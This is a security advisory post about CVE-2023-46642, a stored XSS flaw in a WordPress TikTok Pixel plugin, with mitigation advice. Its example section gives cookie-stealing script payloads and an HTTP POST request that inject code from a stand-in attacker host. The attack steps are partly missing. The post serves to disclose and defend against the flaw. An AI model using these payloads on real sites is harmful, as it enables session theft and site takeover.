CVE CyberSecurity Database News

CVE-2023-46642 - Authenticated Stored XSS in SAHU TikTok Pixel for E-Commerce WordPress Plugin <= 1.2.2

Poster -

If you're running an online store with WordPress and using the SAHU TikTok Pixel for E-Commerce plugin (version 1.2.2 or below), you should pay close attention: there's a serious security bug—CVE-2023-46642—that can let an attacker inject malicious scripts right into your WordPress backend, even if you require admin permissions to exploit it.

In this post, we'll break down what this vulnerability means, how an attacker could use it, see example code, and discuss what to do next.

What is CVE-2023-46642?

This vulnerability is a Stored Cross-Site Scripting (XSS) bug discovered in the SAHU TikTok Pixel for E-Commerce WordPress Plugin, up to and including version 1.2.2. In short, if someone logs in as an admin (or above), they can inject JavaScript into settings that will execute for other dashboard users, potentially leading to stolen cookies, compromised site control, or further attacks.

Privilege required: Admin+ (administrator and above)

- WordPress Plugin page
- NVD Reference – CVE-2023-46642
- Patchstack Advisory

How Does the Exploit Work?

The plugin allows admin users to configure various settings from the WordPress dashboard. However, it *does not sanitize input* properly when saving some of these settings. That means a user with admin rights (or an attacker who buys/hacks an admin account) can inject arbitrary JavaScript into those options.

When another administrator (or anyone with sufficient access) views the settings page, the malicious script runs in their browser, carrying out whatever evil tasks the attacker has coded.

Clicks "Save".

5. Any admin who views that settings page thereafter will unknowingly run the attacker's JS code – for example, sending their login cookie to the attacker.

Example Exploit Code

Let's look at how this might play out. Suppose there's a settings field called Pixel ID in the plugin:

Malicious payload

"><script>fetch('https://evilsite.example/steal?c='+document.cookie)</script>

Once injected, saved, and viewed by another admin, the code will execute and send that user's cookie to the attacker's remote server.

An attacker can inject payload via a POST request while saving plugin settings

POST /wp-admin/admin.php?page=sahu-tiktok-pixel-settings HTTP/1.1
Host: victimsite.com
Cookie: wordpress_logged_in=YOUR_ADMIN_COOKIE;
Content-Type: application/x-www-form-urlencoded

sahu_tiktok_pixel_id="><script src='https://evilsite.example/mal.js'></script>&save=1

Alternatively, they may use the admin UI. The plugin fails to clean the input, so anything entered is saved as-is and rendered verbatim in the dashboard HTML.

Impact and Risks

- Privilege escalation: If an attacker can steal authentication cookies, they get admin access to your site, allowing them to add further backdoors, deface content, or even delete your site.
- Malware distribution: Attackers can use XSS to inject ads, phishing pages, or malware for visitors or site operators.
- Widespread compromise: This issue opens the door for wider attacks on any WordPress site using vulnerable plugin versions.

1. Update Immediately

The plugin authors released a patch after v1.2.2. Upgrade to the *latest available version*.
👉 Download updated plugin from WordPress.org

2. Sanitization Best Practices

If you’re a developer, always use sanitize_text_field(), esc_html(), or similar WordPress sanitizers on user inputs that are later rendered in the admin or frontend.

3. Monitor your site

Check your plugin settings for strange or unknown JavaScript code. Examine user accounts for new/unusual admins.

4. Restrict dashboard access

If possible, restrict dashboard access to trusted IPs or use strong 2FA for all admins.

References

- NVD: CVE-2023-46642
- Patchstack Report
- Plugin on WordPress.org

Conclusion

Stored XSS vulnerabilities are *not a joke*, especially in the admin dashboard—an admin-level attacker can destroy your site or take it over with just a few keystrokes. If you use the SAHU TikTok Pixel for E-Commerce plugin, update right away and check your settings for any strange code.

Stay safe!
If you found this helpful, share it with others who use this plugin, or your WordPress security community.


*This article was written exclusively for your knowledge, with simple language and real-world clarity. For any questions or more details, do not hesitate to reach out in the comments.*

Timeline

Published on: 11/08/2023 17:15:07 UTC
Last modified on: 11/15/2023 18:45:53 UTC